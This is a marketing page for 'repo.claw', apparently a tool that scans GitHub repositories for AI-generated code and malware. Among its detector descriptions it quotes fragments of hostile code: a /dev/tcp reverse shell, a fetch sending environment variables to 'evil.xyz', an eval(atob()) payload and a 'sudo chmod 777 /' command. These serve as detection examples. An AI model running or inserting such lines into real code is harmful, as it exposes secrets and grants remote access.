SCANTHE CODEWITH AI.
Scan any GitHub repository for AI-generated code, hidden viruses, and malicious patterns. Real-time analysis, threat detection, and confidence scoring — just paste a repo link.
Scan any GitHub repository for AI-generated code, hidden viruses, and malicious patterns. Real-time analysis, threat detection, and confidence scoring — just paste a repo link.
LATENCY
< 0s
ACCURACY
0%
REPOS SCANNED
0+
LANGUAGES
0
Identify AI-generated code patterns with high accuracy using advanced neural analysis.
Detect hidden malware, trojans, and backdoors embedded in repository code.
Deep analysis of suspicious code structures and anomalous coding patterns.
Instant results in under 3 seconds. Just paste a repo link and get immediate analysis.
Identify AI-generated code patterns with high accuracy using advanced neural analysis.
Detect hidden malware, trojans, and backdoors embedded in repository code.
Deep analysis of suspicious code structures and anomalous coding patterns.
Instant results in under 3 seconds. Just paste a repo link and get immediate analysis.
Identify AI-generated code patterns with high accuracy using advanced neural analysis.
Detect hidden malware, trojans, and backdoors embedded in repository code.
Deep analysis of suspicious code structures and anomalous coding patterns.
Instant results in under 3 seconds. Just paste a repo link and get immediate analysis.
Identify AI-generated code patterns with high accuracy using advanced neural analysis.
Detect hidden malware, trojans, and backdoors embedded in repository code.
Deep analysis of suspicious code structures and anomalous coding patterns.
Instant results in under 3 seconds. Just paste a repo link and get immediate analysis.
Detailed confidence metrics per file with breakdown of detection certainty.
Direct scanning from any public GitHub repository. Paste a link, get results.
Collaborate and share scan results across your entire development team.
Integrate repo.claw scanning directly into your CI/CD pipeline and workflow.
Detailed confidence metrics per file with breakdown of detection certainty.
Direct scanning from any public GitHub repository. Paste a link, get results.
Collaborate and share scan results across your entire development team.
Integrate repo.claw scanning directly into your CI/CD pipeline and workflow.
Detailed confidence metrics per file with breakdown of detection certainty.
Direct scanning from any public GitHub repository. Paste a link, get results.
Collaborate and share scan results across your entire development team.
Integrate repo.claw scanning directly into your CI/CD pipeline and workflow.
Detailed confidence metrics per file with breakdown of detection certainty.
Direct scanning from any public GitHub repository. Paste a link, get results.
Collaborate and share scan results across your entire development team.
Integrate repo.claw scanning directly into your CI/CD pipeline and workflow.
Six steps to a full security report. Click any step to see live output.
Launch the repo.claw scan engine with a single command. It initializes the AI analysis pipeline, connects to the detection models, and prepares for scanning.
12 specialized detectors scan every file. Real findings from real scans.
Pattern match against ChatGPT, Copilot, and Claude signatures
matches src/utils/helpers.ts — style entropy 0.12, naming score 94%
Analyzes writing patterns, variable naming, comment style, and structural consistency to identify AI-authored files.
3xHidden reverse shell in postinstall script
matches scripts/setup.sh — exec /bin/bash -i >& /dev/tcp/...
Detects hidden remote access payloads, reverse shells, and trojan code disguised as legitimate utilities.
4xStealth XMRig miner embedded in worker thread
matches src/workers/compute.js — crypto.randomBytes + stratum://
Identifies mining scripts that hijack CPU/GPU resources, including pool connections and hash rate throttling.
2xEnvironment variables sent to external endpoint
matches src/config/init.ts — fetch('https://evil.xyz', {body: process.env})
Catches code that silently leaks secrets, cookies, private keys, or user data to unknown external servers.
3xUnescaped user input in SQL query builder
matches src/db/query.ts — `SELECT * FROM users WHERE id=${req.params.id}`
Scans for SQL injection, XSS, command injection, LDAP injection, and other input validation failures.
5xAWS access key exposed in source code
matches src/config/aws.ts — AKIA... (20 char key pattern)
Detects API keys, passwords, tokens, private keys, and credentials committed directly to source code.
3xBase64-encoded eval() payload in dependency
matches node_modules/help-util/index.js — eval(atob('...'))
Flags intentionally unreadable code: base64 payloads, hex-encoded strings, packed/minified malware.
2xMD5 used for password hashing
matches src/auth/hash.ts — crypto.createHash('md5')
Identifies broken encryption, deprecated algorithms, insecure random generation, and weak hashing.
2xOutbound request to unknown domain on startup
matches src/init.ts — fetch('https://unknown-domain.xyz/ping')
Detects unexpected outbound connections, hidden webhooks, DNS exfiltration, and suspicious API calls.
3xSubprocess spawns root shell via sudo
matches scripts/install.sh — sudo chmod 777 / && exec bash
Catches code that attempts to gain elevated permissions, exploit SUID binaries, or bypass access controls.
2xKnown CVE in lodash@4.17.20
matches package.json — CVE-2021-23337 (prototype pollution)
Checks package manifests against CVE databases, flags typosquatted modules and supply chain risks.
1xPath traversal in file upload handler
matches src/api/upload.ts — path.join(dir, req.body.filename)
Detects unauthorized file reads/writes, directory traversal exploits, symlink attacks, and temp file abuse.
2x...and dozens more patterns across supply chain attacks, deserialization, prototype pollution, and other emerging threats.
Integrate repo.claw scanning into your workflow. Choose your plan and pay with crypto.
For individual developers who scan regularly.
For teams shipping production code daily.
For enterprises with custom security needs.
Explore the repo.claw API documentation. Endpoints, authentication, response schemas, and integration guides — everything you need to build on top of repo.claw.
View Documentation→Add the repo.claw bot to your chat. Paste a GitHub link, get a full security report — without leaving Telegram.
Direct message scanning
Message the bot directly with any GitHub repository URL. It opens a mini terminal inside Telegram — same scanning engine, same results, zero setup.
PRO plan feature
Add repo.claw to your team's Telegram group. Anyone can paste a repo link and the bot auto-scans it — keeping your entire team protected in real time.
Three crustaceans. One mission. Zero tolerance for bad code.

Chief Claw Officer
Pinches bugs before they pinch you. Has never lost a code review fight. Sleeps in a server rack.

Head of Neural Pinching
Trained the AI models by staring at code until it confessed. Her shell is hardened against XSS.

VP of Crustacean Security
Former bouncer at the GitHub ocean. Catches malware with both claws tied behind his back.
Think you belong in the tank?
Apply Now